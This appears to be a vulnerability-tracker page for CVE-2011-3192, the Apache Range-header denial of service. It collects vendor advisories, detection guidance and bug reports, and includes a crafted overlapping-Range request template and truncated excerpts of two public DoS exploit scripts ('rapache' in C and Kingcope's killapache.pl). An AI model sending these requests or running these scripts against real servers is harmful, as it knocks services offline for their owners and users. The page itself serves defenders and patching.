CVE-2011-3192
published 2011-08-29CVE-2011-3192: The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service…
PriorityP273high7.8CVSS 2.0
AVNACLAuNCNINAC
ITWEXPLOITVulnCheck KEV
Exploited in the wild
EPSS
98.95%
99.9th percentile
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
Affected
20 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| apache | http_server | >= 2.0.35 < 2.0.65 | 2.0.65 |
| apache | http_server | >= 2.2.0 < 2.2.20 | 2.2.20 |
| apache | httpd | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| canonical | ubuntu_linux | — | — |
| debian | apache2 | < apache2 2.2.19-2 (bookworm) | apache2 2.2.19-2 (bookworm) |
| opensuse | opensuse | — | — |
| opensuse | opensuse | — | — |
| suse | linux_enterprise_server | — | — |
| suse | linux_enterprise_server | — | — |
| suse | linux_enterprise_software_development_kit | — | — |
| suse | linux_enterprise_software_development_kit | — | — |
| tripodworks | gigapod_2010_firmware | <= 3.01.02 | — |
| tripodworks | gigapod_3_firmware | <= 3.01.02 | — |
| tripodworks | gigapod_officehard_firmware | <= 3.04.03 | — |
| tripodworks_co_ltd | gigapod_2010_gigapod_3_appliance_model | — | — |
| tripodworks_co_ltd | gigapod_2010_gigapod_3_software_model | — | — |
| tripodworks_co_ltd | gigapod_officehard_appliance_model | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandHEAD / HTTP/1.1\r\nHost: <target>\r\nRange:bytes=0-<overlapping ranges>\r\nAccept-Encoding: gzip\r\nConnection: close\r\n\r\n↗
- →Detect CVE-2011-3192 exploitation by inspecting HTTP requests for a Range header containing multiple overlapping byte ranges (e.g., 'Range: bytes=0-,0-' or a large number of overlapping ranges), which triggers memory and CPU exhaustion on vulnerable Apache versions 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19. ↗
- →Monitor for nmap NSE script detection result 'http-vuln-cve2011-3192' flagging Apache byterange filter DoS vulnerability on scanned hosts, indicating active reconnaissance for CVE-2011-3192. ↗
- →Alert on high-volume concurrent TCP connections to port 80 or 8001 from a single source sending HEAD requests with Range headers, consistent with the 'Apache Killer' DoS tool spawning 50 threads each sending 10 requests with overlapping byte ranges. ↗
- →Check for the Metasploit auxiliary module 'auxiliary/dos/http/apache_range_dos' being used against Apache servers; this module implements the 'Apache Killer' technique targeting the byterange filter. ↗
- ·GIGAPOD file server appliances expose the vulnerable Apache instance specifically on port 8001/tcp (administrative interface), not only on the standard 80/443 ports; ensure detection coverage includes this non-standard port. ↗
- ·The vulnerability affects Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19; versions fixed in Debian are 2.2.19-2 and later. ↗
CVSS provenance
nvdv2.07.8HIGHAV:N/AC:L/Au:N/C:N/I:N/A:C
osv7.8HIGH
vulncheck7.8HIGH
vendor_apache7.8HIGH
vendor_debian7.8HIGH
vendor_redhat7.8HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ubuntu
Apache vulnerability
vendor_ubuntu·2011-09-01
CVE-2011-3192 Apache vulnerability
Title: Apache vulnerability
Summary: A remote attacker could send crafted input to Apache and cause it to crash.
A flaw was discovered in the byterange filter in Apache. A remote attacker
could exploit this to cause a denial of service via resource exhaustion.
Instructions: In general, a standard system update will make all the necessary changes.
Red Hat
httpd: multiple ranges DoS
vendor_redhat·2011-08-20·CVSS 7.8
CVE-2011-3192 [HIGH] httpd: multiple ranges DoS
httpd: multiple ranges DoS
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
Statement: Before updated packages are deployed, users can deploy configuration changes to mitigate this flaw:
https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2011-3192#c18
Package: httpd (Red Hat Directory Server 8) - Affected
Debian
CVE-2011-3192: apache2 - The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and ...
vendor_debian·2011·CVSS 7.8
CVE-2011-3192 [HIGH] CVE-2011-3192: apache2 - The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and ...
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
Scope: local
bookworm: resolved (fixed in 2.2.19-2)
bullseye: resolved (fixed in 2.2.19-2)
forky: resolved (fixed in 2.2.19-2)
sid: resolved (fixed in 2.2.19-2)
trixie: resolved (fixed in 2.2.19-2)
Cisco
Apache HTTPd Range Header Denial of Service Vulnerability
vendor_cisco
CVE-2011-3192 Apache HTTPd Range Header Denial of Service Vulnerability
CVE-2011-3192: Apache HTTPd Range Header Denial of Service Vulnerability
The Apache HTTPd server contains a denial of service vulnerability when it handles multiple, overlapping ranges. Multiple Cisco products may be affected by this vulnerability. Mitigations that can be deployed on Cisco devices within the network are available in the Cisco Applied Intelligence companion document for this Advisory: https://sec.cloudapps.cisco.com/security/center/viewAMBAlert.x?alertId=24024 This advisory is posted at https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20110830-apache .
Bug IDs: CSCts35635, CSCts35610, CSCts33313, CSCts33321, CSCts33317
Apache
Apache httpd: CVE-2011-3192
vendor_apache·CVSS 7.8
CVE-2011-3192 [HIGH] Apache httpd: CVE-2011-3192
Apache httpd: CVE-2011-3192
A flaw was found in the way the Apache HTTP Server handled Range HTTP headers. A remote attacker could use this flaw to cause httpd to use an excessive amount of memory and CPU time via HTTP requests with a specially-crafted Range header. This could be used in a denial of service attack. Advisory: CVE-2011-3192.txt Reported to security team 2011-08-20 Issue public 2011-08-20 Update 2.2.20 released 2011-08-30 Update 2.0.65 released 2013-07-12 Affects 2.2.19, 2.2.18, 2.2.17, 2.2.16, 2.2.15, 2.2.14, 2.2.13, 2.2.12, 2.2.11, 2.2.10, 2.2.9, 2.2.8, 2.2.6, 2.2.5, 2.2.4, 2.2.3, 2.2.2, 2.2.0, 2.0.64, 2.0.63, 2.0.61, 2.0.59, 2.0.58, 2.0.55, 2.0.54, 2.0.53, 2.0.52, 2.0.51, 2.0.50, 2.0.49, 2.0.48, 2.0.47, 2.0.46, 2.0.45, 2.0.44, 2.0.43, 2.0.42, 2.0.40, 2.0.39, 2.0.37, 2.0.36
GHSA
GHSA-mcww-h5h9-995g: GIGAPOD file servers (Appliance model and Software model) provide two web interfaces, 80/tcp and 443/tcp for user operation, and 8001/tcp for administ
ghsa_unreviewed·2023-09-08·CVSS 7.8
CVE-2014-5329 [HIGH] GHSA-mcww-h5h9-995g: GIGAPOD file servers (Appliance model and Software model) provide two web interfaces, 80/tcp and 443/tcp for user operation, and 8001/tcp for administ
GIGAPOD file servers (Appliance model and Software model) provide two web interfaces, 80/tcp and 443/tcp for user operation, and 8001/tcp for administrative operation.
8001/tcp is served by a version of Apache HTTP server containing a flaw in handling HTTP requests (CVE-2011-3192), which may lead to a denial-of-service (DoS) condition.
GHSA
GHSA-r3pv-69hm-fcjw: The byterange filter in the Apache HTTP Server 1
ghsa_unreviewed·2022-05-13·CVSS 7.8
CVE-2011-3192 [HIGH] CWE-400 GHSA-r3pv-69hm-fcjw: The byterange filter in the Apache HTTP Server 1
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
OSV
CVE-2011-3192: The byterange filter in the Apache HTTP Server 1
osv·2011-08-29·CVSS 7.8
CVE-2011-3192 [HIGH] CVE-2011-3192: The byterange filter in the Apache HTTP Server 1
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
VulnCheck
Apache HTTP Server Uncontrolled Resource Consumption
vulncheck·2011·CVSS 7.8
CVE-2011-3192 [HIGH] Apache HTTP Server Uncontrolled Resource Consumption
Apache HTTP Server Uncontrolled Resource Consumption
The byterange filter in the Apache HTTP Server 1.3.x, 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, as exploited in the wild in August 2011, a different vulnerability than CVE-2007-0086.
Affected: Apache HTTP Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://httpd.apache.org/security/CVE-2011-3192.txt; https://www.cve.org/CVERecord?id=CVE-2011-3192
Exploit PoC: https://vulncheck.com/xdb/f381008f0c1b; https://vulncheck.com/xdb/85ff4109a0d6
No detection rules found.
Exploit-DB
Apache - Denial of Service
exploitdb·2011-12-09·CVSS 7.8
CVE-2014-5329 [HIGH] Apache - Denial of Service
Apache - Denial of Service
---
/*
* This is a reverse engineered version of the exploit for CVE-2011-3192 made
* by ev1lut10n (http://jayakonstruksi.com/backupintsec/rapache.tgz).
* Copyright 2011 Ramon de C Valle
*
* Compile with the following command:
* gcc -Wall -pthread -o rcvalle-rapache rcvalle-rapache.c
*/
#include
#include
#include
#include
#include
#include
#include
#include
#include
void ptrace_trap(void) __attribute__ ((constructor));
void
ptrace_trap(void) {
if (ptrace(PTRACE_TRACEME, 0, 0, 0) argv_string);
j = 0;
while (j != 10) {
struct addrinfo hints;
struct addrinfo *result, *rp;
int sfd, s;
ssize_t nwritten;
memset(&hints, 0, sizeof(struct addrinfo));
hints.ai_family = AF_UNSPEC;
hints.ai_socktype = SOCK_STREAM;
hints.ai_flags = 0;
hints.ai_protocol = 0;
s = getadd
Exploit-DB
Apache - Remote Memory Exhaustion (Denial of Service)
exploitdb·2011-08-19
CVE-2014-5329 Apache - Remote Memory Exhaustion (Denial of Service)
Apache - Remote Memory Exhaustion (Denial of Service)
---
#Apache httpd Remote Denial of Service (memory exhaustion)
#By Kingcope
#Year 2011
#
# Will result in swapping memory to filesystem on the remote side
# plus killing of processes when running out of swap space.
# Remote System becomes unstable.
#
use IO::Socket;
use Parallel::ForkManager;
sub usage {
print "Apache Remote Denial of Service (memory exhaustion)\n";
print "by Kingcope\n";
print "usage: perl killapache.pl [numforks]\n";
print "example: perl killapache.pl www.example.com 50\n";
}
sub killapache {
print "ATTACKING $ARGV[0] [using $numforks forks]\n";
$pm = new Parallel::ForkManager($numforks);
$|=1;
srand(time());
$p = "";
for ($k=0;$kstart and next;
$x = "";
my $sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
P
Metasploit
Apache Range Header DoS (Apache Killer)
metasploit
Apache Range Header DoS (Apache Killer)
Apache Range Header DoS (Apache Killer)
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called "Apache Killer".
HackerOne
Out-of-date Version (Apache)
hackerone·2019-12-02·CVSS 5.0
[MEDIUM] Out-of-date Version (Apache)
Out-of-date Version (Apache)
URL https://████████/
Identified Version 2.2.15 (contains 4 important and 10 other vulnerabilities)
Latest Version 2.2.31
Vulnerability Database Result is based on 27.10.2016 vulnerability database content.
Vulnerability Details
Link identified you are using an out-of-date version of Apache.
Impact
Since this is an old version of the software, it may be vulnerable to attacks.
Remedy
Please upgrade your installation of Apache to the latest stable version.
Remedy References
•Downloading the Apache HTTP Server
Known Vulnerabilities in this Version
Medium Apache mod_cache and mod_dav Request Handling Denial of Service Vulnerability
The mod_cache and mod_dav modules in the Apache HTTP Server allow remote attackers to cause a denial of service (process
HackerOne
grtp.co is vulnerable to http-vuln-cve2011-3192
hackerone·2016-02-12·CVSS 7.8
CVE-2011-3192 [HIGH] grtp.co is vulnerable to http-vuln-cve2011-3192
grtp.co is vulnerable to http-vuln-cve2011-3192
vulnerability i have found!
| http-vuln-cve2011-3192:
| VULNERABLE:
| Apache byterange filter DoS
| State: VULNERABLE
| IDs: CVE:CVE-2011-3192 OSVDB:74721
| The Apache web server is vulnerable to a denial of service attack when numerous
| overlapping byte ranges are requested.
| Disclosure date: 2011-08-19
About Vulnerability
The byterange filter in the Apache HTTP Server 2.0.x through 2.0.64, and 2.2.x through 2.2.19 allows remote attackers to cause a denial of service (memory and CPU consumption) via a Range header that expresses multiple overlapping ranges, exploit called "Apache Killer"
i have tested it using nmap and metasploit and is 100% vulnerable
when i found it i tested it in metasploit i used auxiliary/dos/http/apache_r
HackerOne
Apache Range Header Denial of Service Attack (Confirmed PoC)
hackerone·2016-01-01·CVSS 7.8
[HIGH] Apache Range Header Denial of Service Attack (Confirmed PoC)
Apache Range Header Denial of Service Attack (Confirmed PoC)
owncloud.com is vulnerable to Apache range header denial of service. This was confirmed by injecting Range: header payloads and analyzing the request vs. response times to an arbitrary page. The results confirm that processing times took up to 50,000 milliseconds per request when the range header values were specified compared to just 1,000 milliseconds when no range header was specified. This was further confirmed by the Server: header field for owncloud which states the running version of Apache is 2.2.17 which is vulnerable to this attack.
This is caused by CVE-2011-3192 which means the server (Apache) is running a vulnerable version of Apache (All versions prior to 2.2.20 are vulnerable). The results could also be further c
Bugzilla
Remote Denial Of Service with Unknow binary compiled by "ev1lut10n"
bugzilla·2011-12-08
[HIGH] Remote Denial Of Service with Unknow binary compiled by "ev1lut10n"
Remote Denial Of Service with Unknow binary compiled by "ev1lut10n"
Description of problem:
Searching in the web, i found a exploit compiled, that the author not show ANY source code, only delivery a binary compiled in ubuntu (i see in hexedit).
The binary is a MODIFIED killapache.pl of Kingcope, the variant is that is realized in C, and the byte range is 0-,0- and not 0-100 like Kingcope, in order, too simulate to remote host that the request is originated in localhost, no in the attacker host, causing a denial of service un httpd service.
Apache no respond while the exploit is being launched, if is stopped, show a lot of information in access_log and restore the service in 2 minutes aprox.
Version-Release number of selected component (if applicable):
Fedora 16 - httpd-2.2.21-1.fc16.
Bugzilla
CVE-2011-3192 httpd: multiple ranges DoS [fedora-all]
bugzilla·2011-08-25·CVSS 7.8
CVE-2011-3192 [HIGH] CVE-2011-3192 httpd: multiple ranges DoS [fedora-all]
CVE-2011-3192 httpd: multiple ranges DoS [fedora-all]
This is an automatically created tracking bug! It was created to ensure
that one or more security vulnerabilities are fixed in affected Fedora
versions.
For comments that are specific to the vulnerability please use bugs filed
against "Security Response" product referenced in the "Blocks" field.
For more information see:
http://fedoraproject.org/wiki/Security/TrackingBugs
When creating a Bodhi update request, please include the bug IDs of the
respective parent bugs filed against the "Security Response" product.
Please mention CVE ids in the RPM changelog when available.
Bodhi update submission link:
https://admin.fedoraproject.org/updates/new/?type_=security&bugs=732928
Please note: this issue affects multiple supported versions o
Bugzilla
CVE-2011-3192 httpd: multiple ranges DoS
bugzilla·2011-08-24·CVSS 7.8
CVE-2011-3192 [HIGH] CVE-2011-3192 httpd: multiple ranges DoS
CVE-2011-3192 httpd: multiple ranges DoS
An exploit was posted to full-disclosure labelled "Apache Killer". This script creates a number of threads that use multiple Range headers to exhaust memory on the Apache server.
The ASF httpd development team are working on a fix for this issue:
http://www.gossamer-threads.com/lists/apache/dev/401638
Discussion:
(In reply to comment #0)
> An exploit was posted to full-disclosure labelled "Apache Killer". This script
> creates a number of threads that use multiple Range headers to exhaust memory
> on the Apache server.
http://lists.grok.org.uk/pipermail/full-disclosure/2011-August/082299.html
---
Upstream has released an advisory, which documents possible configuration changes that can be used to mitigate this flaw before the final fix is ava
CTF
EZ / optimum
ctf_writeups·CVSS 7.8
[HIGH] EZ / optimum
# recon
- nmap
```
PORT STATE SERVICE VERSION
80/tcp open http HttpFileServer httpd 2.3
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-fileupload-exploiter:
|
|_ Couldn't find a file-type field.
| http-method-tamper:
| VULNERABLE:
| Authentication bypass by HTTP verb tampering
| State: VULNERABLE (Exploitable)
| This web server contains password protected resources vulnerable to authentication bypass
| vulnerabilities via HTTP verb tampering. This is often found in web servers that only limit access to the
| common HTTP methods and in misconfigured .htaccess files.
|
| Extra information:
|
| URIs suspected to be vulnerable to HTTP verb tampering:
| /~login [GEN
http://archives.neohapsis.com/archives/fulldisclosure/2011-08/0285.htmlhttp://blogs.oracle.com/security/entry/security_alert_for_cve_2011http://lists.apple.com/archives/Security-announce/2011//Oct/msg00003.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00006.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00009.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00010.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00011.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-11/msg00008.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-11/msg00011.htmlhttp://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3c20110824161640.122D387DD%40minotaur.apache.org%3ehttp://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g%40mail.gmail.com%3ehttp://marc.info/?l=bugtraq&m=131551295528105&w=2http://marc.info/?l=bugtraq&m=131731002122529&w=2http://marc.info/?l=bugtraq&m=132033751509019&w=2http://marc.info/?l=bugtraq&m=133477473521382&w=2http://marc.info/?l=bugtraq&m=133951357207000&w=2http://marc.info/?l=bugtraq&m=134987041210674&w=2http://osvdb.org/74721http://seclists.org/fulldisclosure/2011/Aug/175http://secunia.com/advisories/45606http://secunia.com/advisories/45937http://secunia.com/advisories/46000http://secunia.com/advisories/46125http://secunia.com/advisories/46126http://securitytracker.com/id?1025960http://support.apple.com/kb/HT5002http://www.apache.org/dist/httpd/Announcement2.2.htmlhttp://www.cisco.com/en/US/products/products_security_advisory09186a0080b90d73.shtmlhttp://www.exploit-db.com/exploits/17696http://www.gossamer-threads.com/lists/apache/dev/401638http://www.kb.cert.org/vuls/id/405811http://www.mandriva.com/security/advisories?name=MDVSA-2011:130http://www.mandriva.com/security/advisories?name=MDVSA-2013:150http://www.oracle.com/technetwork/topics/security/alert-cve-2011-3192-485304.htmlhttp://www.oracle.com/technetwork/topics/security/cpujan2012-366304.htmlhttp://www.oracle.com/technetwork/topics/security/cpujul2012-392727.htmlhttp://www.oracle.com/technetwork/topics/security/cpuoct2011-330135.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1245.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1294.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1300.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1329.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1330.htmlhttp://www.redhat.com/support/errata/RHSA-2011-1369.htmlhttp://www.securityfocus.com/bid/49303http://www.ubuntu.com/usn/USN-1199-1https://bugzilla.redhat.com/show_bug.cgi?id=732928https://exchange.xforce.ibmcloud.com/vulnerabilities/69396https://help.ecostruxureit.com/display/public/UADCE725/Security+fixes+in+StruxureWare+Data+Center+Expert+v7.6.0https://issues.apache.org/bugzilla/show_bug.cgi?id=51714https://lists.apache.org/thread.html/54a42d4b01968df1117cea77fc53d6beb931c0e05936ad02af93e9ac%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/5df9bfb86a3b054bb985a45ff9250b0332c9ecc181eec232489e7f79%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/8d63cb8e9100f28a99429b4328e4e7cebce861d5772ac9863ba2ae6f%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/f7f95ac1cd9895db2714fa3ebaa0b94d0c6df360f742a40951384a53%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r0276683d8e1e07153fc8642618830ac0ade85b9ae0dc7b07f63bb8fc%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r1d201e3da31a2c8aa870c8314623caef7debd74a13d0f25205e26f15%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r2cb985de917e7da0848c440535f65a247754db8b2154a10089e4247b%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r57608dc51b79102f3952ae06f54d5277b649c86d6533dcd6a7d201f7%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r5f9c22f9c28adbd9f00556059edc7b03a5d5bb71d4bb80257c0d34e4%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r688df6f16f141e966a0a47f817e559312b3da27886f59116a94b273d%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r75cbe9ea3e2114e4271bbeca7aff96117b50c1b6eb7c4772b0337c1f%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r8828e649175df56f1f9e3919938ac7826128525426e2748f0ab62feb%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r9e8622254184645bc963a1d47c5d47f6d5a36d6f080d8d2c43b2b142%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r9ea3538f229874c80a10af473856a81fbf5f694cd7f471cc679ba70b%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/r9f93cf6dde308d42a9c807784e8102600d0397f5f834890708bf6920%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/rb9c9f42dafa25d2f669dac2a536a03f2575bc5ec1be6f480618aee10%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/rdca61ae990660bacb682295f2a09d34612b7bb5f457577fe17f4d064%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/re2e23465bbdb17ffe109d21b4f192e6b58221cd7aa8797d530b4cd75%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/rf6449464fd8b7437704c55f88361b66f12d5b5f90bcce66af4be4ba9%40%3Ccvs.httpd.apache.org%3Ehttps://lists.apache.org/thread.html/rfbaf647d52c1cb843e726a0933f156366a806cead84fbd430951591b%40%3Ccvs.httpd.apache.org%3Ehttps://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14762https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A14824https://oval.cisecurity.org/repository/search/definition/oval%3Aorg.mitre.oval%3Adef%3A18827http://archives.neohapsis.com/archives/fulldisclosure/2011-08/0285.htmlhttp://blogs.oracle.com/security/entry/security_alert_for_cve_2011http://lists.apple.com/archives/Security-announce/2011//Oct/msg00003.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00006.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00009.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00010.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-09/msg00011.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-11/msg00008.htmlhttp://lists.opensuse.org/opensuse-security-announce/2011-11/msg00011.htmlhttp://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/%3c20110824161640.122D387DD%40minotaur.apache.org%3ehttp://mail-archives.apache.org/mod_mbox/httpd-dev/201108.mbox/%3cCAAPSnn2PO-d-C4nQt_TES2RRWiZr7urefhTKPWBC1b+K1Dqc7g%40mail.gmail.com%3ehttp://marc.info/?l=bugtraq&m=131551295528105&w=2http://marc.info/?l=bugtraq&m=131731002122529&w=2http://marc.info/?l=bugtraq&m=132033751509019&w=2http://marc.info/?l=bugtraq&m=133477473521382&w=2http://marc.info/?l=bugtraq&m=133951357207000&w=2http://marc.info/?l=bugtraq&m=134987041210674&w=2http://osvdb.org/74721http://seclists.org/fulldisclosure/2011/Aug/175http://secunia.com/advisories/45606http://secunia.com/advisories/45937http://secunia.com/advisories/46000http://secunia.com/advisories/46125http://secunia.com/advisories/46126http://securitytracker.com/id?1025960http://support.apple.com/kb/HT5002http://www.apache.org/dist/httpd/Announcement2.2.htmlhttp://www.cisco.com/en/US/products/products_security_advisory09186a0080b90d73.shtml
+ 44 more references
2011-08-29
Published
Exploited in the wild